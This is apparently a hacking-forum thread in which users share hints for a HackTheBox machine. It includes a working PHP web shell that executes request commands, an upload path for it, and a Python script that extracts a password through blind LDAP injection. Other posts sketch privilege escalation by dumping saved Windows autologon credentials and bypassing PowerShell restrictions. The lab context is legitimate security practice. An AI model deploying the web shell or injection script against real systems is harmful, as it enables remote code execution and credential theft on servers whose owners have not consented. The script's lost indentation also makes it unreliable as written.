Possibly Related Threads…

D0rke1e · Jan 21, 2024, 08:55 AM

can anyone share php shell payload

bl4cksku11 · Jan 21, 2024, 09:02 AM

(Jan 21, 2024, 08:55 AM)D0rke1e Wrote: can anyone share php shell payload

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Put it into a php file, and upload it into the server by the SOC Report module

DwightSchrute · Jan 21, 2024, 09:10 AM

i am in, but how to get to the user flag?

D0rke1e · Jan 21, 2024, 09:47 AM

https://github.com/antonioCoco/ConPtyShell i run this tool but doesn't works properly what can do ?

xlr · Jan 21, 2024, 09:50 AM

how are you guys logging in (where) using the technician password

peRd1 · Jan 21, 2024, 10:00 AM

(Jan 21, 2024, 09:50 AM)xlr Wrote: how are you guys logging in (where) using the technician password

Logon to the web portal where you can use the SOC upload functionality to gain foothold. Discussed above thoroughly.

DwightSchrute · Jan 21, 2024, 10:01 AM

could need a little hint...i /private/encoded.txt a rabbit hole?
if not - how to deal with it?

Art10n · (This post was last modified: Jan 21, 2024, 11:20 AM by Art10n.)

(Jan 21, 2024, 06:40 AM)qxuarpcy Wrote:
(Jan 21, 2024, 06:38 AM)jyosun Wrote:
(Jan 21, 2024, 06:30 AM)qxuarpcy Wrote:
(Jan 21, 2024, 06:09 AM)jyosun Wrote:
(Jan 21, 2024, 06:02 AM)qxuarpcy Wrote: got user, any hint for root

How did you get the user flag?

svc_web > webservice > jdoe > user flag

i got some credential about webservice, but i don't know how to use that. can you give me a little hint more?

runascs

I got credentias, and uploaded RunCs.exe to box. Using RunasCs I can read files as webservice ... but I cannot find the jdoe credentials

minimini510 · Jan 21, 2024, 11:11 AM

code:

import requests
import urllib.parse

charset = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
url_template = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={}*)"
clair = ""

while True:
with open(charset, "r") as charset_file:
for char in charset_file.read():
clair_with_char = clair + char
clair_encoded = urllib.parse.quote(clair_with_char)
s = url_template.format(clair_encoded)
print("Trying URL:", s)
response = requests.get(s)

if "technic" in response.text:
clair += char
print(clair)
break

when your code is looped try add char "*" mannually

peRd1 · (This post was last modified: Jan 21, 2024, 11:25 AM by peRd1.)

(Jan 21, 2024, 10:57 AM)bsbsmaster Wrote: i cant understand how did u get the password for the user i tried so many ways any hint that can might help me i tried the script and brute force and i tried to change the script url didnt work

If you got shell then you can do further enumeration to find out user credentials. It's autologon functionality, saved winlogon credential.

Use this tool - https://github.com/itm4n/PrivescCheck - bypass the powershell exec restriction, run it, analyze the report it dumps... there you have it...

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,170	1 hour ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,491	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	396	Yesterday, 10:36 PM Last Post: op334
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	369	92,003	Yesterday, 04:10 PM Last Post: sabbyahmed
	CBBH Write Ups	hiddenhacker	22	6,226	Yesterday, 06:39 AM Last Post: Usercomplex